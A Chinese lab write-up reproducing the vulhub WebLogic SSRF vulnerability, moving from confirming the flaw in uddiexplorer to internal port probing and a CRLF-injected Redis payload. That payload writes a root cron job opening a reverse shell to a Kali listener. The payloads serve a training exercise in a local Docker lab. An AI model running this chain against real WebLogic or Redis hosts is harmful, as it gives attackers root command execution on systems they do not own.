Weblogic SSRF【漏洞复现】

文章目录

Path : vulhub/weblogic/ssrf

编译及启动测试环境

bash 复制代码
docker compose up -d

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件

访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用

点击Search Public Registries

来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面

漏洞测试

打开BurpSuite测试,点击Search按钮

Ctrl+r发送到Repeater模块,观察数据包

根据数据包的响应信息,可以猜测operator参数后面可以跟一个url地址

利用dnslog平台测试,生成一个域名

成功解析到,说明operator后面 可以做url地址请求,说明存在SSRF 漏洞

访问一个可以访问的IP:PORT,如http://127.0.0.1:80

发现80端口没有开放

在访问7001端口,

通过错误的不同,即可探测内网状态。

环境是在docker上启动的,(docker环境的网段一般是172.*)

注入HTTP头,利用Redis反弹shell

发送三条redis命令,将弹shell脚本写入/etc/crontab

反弹到kali上

bash 复制代码
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.80.141/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码

bash 复制代码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是"\r\n",也就是"%0D%0A"。

将url编码后的字符串放在ssrf的域名后面,发送:

bash 复制代码
http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaury

kali开启监听:

bash 复制代码
nc -lvvp 21

bp发送请求

等待计划任务生效

成功拿到shell

redis不能启动问题解决

在使用sudo docker-compose up -d启动环境的时候,只启动了weblogic,没有启动redis

修改如下配置

bash 复制代码
vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="vsyscall=emulate"

:wq保存后,命令行运行update-grub

reboot重启,redis成功启动

解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854

相关推荐
Immortal__y9 小时前
网络安全初级--搭建
安全·web安全
hans汉斯16 小时前
【计算机科学与应用】面向APT攻击调查的溯源图冗余结构压缩
网络·算法·安全·web安全·yolo·目标检测·图搜索算法
浮江雾19 小时前
SSRF9 各种限制绕过之域名限制绕过
网络·tcp/ip·安全·web安全·ssrf·绕过限制
小小工匠20 小时前
Web安全 - 基于 SM2/SM4 的前后端国产加解密方案详解
web安全·sm2/sm4·前后端国产加解密
桑晒.1 天前
Webshell连接工具原理
安全·web安全·网络安全
mooyuan天天1 天前
DVWA靶场通关笔记-弱会话IDs(Weak Session IDs High级别)
web安全·dvwa靶场·弱会话id
SuperherRo1 天前
Web攻防-PHP反序列化&原生内置类&Exception类&SoapClient类&SimpleXMLElement
php·xss·反序列化·exception·ssrf·原生类·soapclient
Bulestar_xx1 天前
20250711_Sudo 靶机复盘
linux·安全·web安全
Fanmeang2 天前
2025江苏省信息安全管理与评估赛项二三阶段任务书
安全·web安全·信息安全管理与评估·神州数码·全国职业院校技能大赛·二三阶段
学习溢出3 天前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids